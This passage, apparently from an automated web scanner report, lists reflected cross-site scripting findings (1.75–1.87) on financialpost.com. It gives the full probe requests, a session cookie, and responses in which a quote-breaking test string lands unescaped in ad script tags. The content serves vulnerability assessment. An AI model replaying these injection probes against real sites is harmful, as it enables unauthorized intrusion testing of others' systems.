p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44241


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur74d93';e0889b50b05/advice/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur74d93';e0889b50b05;kw=advice;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=77742683?">
...[SNIP]...

1.75. http://www.financialpost.com/entrepreneur/advice/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/advice/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed228'%3b2c8aa648e62 was submitted in the REST URL parameter 2. This input was echoed as ed228';2c8aa648e62 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/adviceed228'%3b2c8aa648e62/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43385


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/adviceed228';2c8aa648e62/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=adviceed228';2c8aa648e62;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=61143280?">
...[SNIP]...

1.76. http://www.financialpost.com/entrepreneur/killer+apps/3967312/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/killer+apps/3967312/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83f2b'%3b12bcecac1dd was submitted in the REST URL parameter 1. This input was echoed as 83f2b';12bcecac1dd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur83f2b'%3b12bcecac1dd/killer+apps/3967312/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75646
Expires: Sun, 19 Dec 2010 03:14:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur83f2b';12bcecac1dd/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur83f2b';12bcecac1dd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=30614803?">
...[SNIP]...

1.77. http://www.financialpost.com/entrepreneur/killer+apps/3967312/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/killer+apps/3967312/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9123'%3bb2fb6e2f239 was submitted in the REST URL parameter 3. This input was echoed as f9123';b2fb6e2f239 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/killer+apps/3967312f9123'%3bb2fb6e2f239/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 53710
Expires: Sun, 19 Dec 2010 03:14:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/killer-apps/3967312f9123';b2fb6e2f239/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=killer-apps;kw=3967312f9123';b2fb6e2f239;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34256389?">
...[SNIP]...

1.78. http://www.financialpost.com/entrepreneur/killer+apps/3967312/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/killer+apps/3967312/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1b1a'%3b6b59f0dfd4e was submitted in the REST URL parameter 4. This input was echoed as d1b1a';6b59f0dfd4e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/killer+apps/3967312/d1b1a'%3b6b59f0dfd4e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43793


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/killer%20apps/3967312/d1b1a';6b59f0dfd4e/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=killer%20apps;kw=3967312;kw=d1b1a';6b59f0dfd4e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=99358960?
...[SNIP]...

1.79. http://www.financialpost.com/executive/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 774a7'%3b09a396780ea was submitted in the REST URL parameter 1. This input was echoed as 774a7';09a396780ea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive774a7'%3b09a396780ea/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43161


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive774a7';09a396780ea/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive774a7';09a396780ea;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=17355478?">
...[SNIP]...

1.80. http://www.financialpost.com/executive/Departures+2010/3987965/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Departures+2010/3987965/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d37d2'%3b1feea254f5a was submitted in the REST URL parameter 1. This input was echoed as d37d2';1feea254f5a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executived37d2'%3b1feea254f5a/Departures+2010/3987965/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 84441
Expires: Sun, 19 Dec 2010 03:11:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executived37d2';1feea254f5a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executived37d2';1feea254f5a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=69285676?">
...[SNIP]...

1.81. http://www.financialpost.com/executive/Departures+2010/3987965/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Departures+2010/3987965/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14022'%3bbd82e3b5b53 was submitted in the REST URL parameter 3. This input was echoed as 14022';bd82e3b5b53 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Departures+2010/398796514022'%3bbd82e3b5b53/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69246
Expires: Sun, 19 Dec 2010 03:12:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/departures-2010/398796514022';bd82e3b5b53/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=departures-2010;kw=398796514022';bd82e3b5b53;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=92756471?">
...[SNIP]...

1.82. http://www.financialpost.com/executive/Departures+2010/3987965/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Departures+2010/3987965/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55e80'%3b7249d7b80f9 was submitted in the REST URL parameter 4. This input was echoed as 55e80';7249d7b80f9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Departures+2010/3987965/55e80'%3b7249d7b80f9 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43809


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/departures%202010/3987965/55e80';7249d7b80f9/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=departures%202010;kw=3987965;kw=55e80';7249d7b80f9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=63817518
...[SNIP]...

1.83. http://www.financialpost.com/executive/Discover+your+true+competitive+advantage/3992781/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Discover+your+true+competitive+advantage/3992781/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86b9c'%3bbb1481860ca was submitted in the REST URL parameter 1. This input was echoed as 86b9c';bb1481860ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive86b9c'%3bbb1481860ca/Discover+your+true+competitive+advantage/3992781/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74233
Expires: Sun, 19 Dec 2010 03:12:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive86b9c';bb1481860ca/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive86b9c';bb1481860ca;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32248287?">
...[SNIP]...

1.84. http://www.financialpost.com/executive/Discover+your+true+competitive+advantage/3992781/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Discover+your+true+competitive+advantage/3992781/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e36a'%3b760d8d1d1a9 was submitted in the REST URL parameter 3. This input was echoed as 7e36a';760d8d1d1a9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Discover+your+true+competitive+advantage/39927817e36a'%3b760d8d1d1a9/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70169
Expires: Sun, 19 Dec 2010 03:12:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/discover-your-true-competitive-advantage/39927817e36a';760d8d1d1a9/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=discover-your-true-competitive-advantage;kw=39927817e36a';760d8d1d1a9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surrou
...[SNIP]...

1.85. http://www.financialpost.com/executive/Discover+your+true+competitive+advantage/3992781/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Discover+your+true+competitive+advantage/3992781/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c91c'%3bb0f449f0d2e was submitted in the REST URL parameter 4. This input was echoed as 1c91c';b0f449f0d2e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Discover+your+true+competitive+advantage/3992781/1c91c'%3bb0f449f0d2e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38647


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/discover%20your%20true%20competitive%20advantage/3992781/1c91c';b0f449f0d2e/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=discover%20your%20true%20competitive%20advantage;kw=3992781;kw=1c91c';b0f449f0d2e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcook
...[SNIP]...

1.86. http://www.financialpost.com/executive/Leadership+companies+honest+with+their+employees/3987151/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Leadership+companies+honest+with+their+employees/3987151/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3dfa'%3bc1a1cb098d5 was submitted in the REST URL parameter 1. This input was echoed as b3dfa';c1a1cb098d5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executiveb3dfa'%3bc1a1cb098d5/Leadership+companies+honest+with+their+employees/3987151/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74644
Expires: Sun, 19 Dec 2010 03:12:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executiveb3dfa';c1a1cb098d5/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executiveb3dfa';c1a1cb098d5;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=83962964?">
...[SNIP]...

1.87. http://www.financialpost.com/executive/Leadership+companies+honest+with+their+employees/3987151/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Leadership+companies+honest+with+their+employees/3987151/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43db7'%3b7532e4f4caa was submitted in the REST URL parameter 3. This input was echoed as 43db7';7532e4f4caa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Leadership+companies+honest+with+their+employees/398715143db7'%3b7532e4f4caa/story.html HTTP/1.1
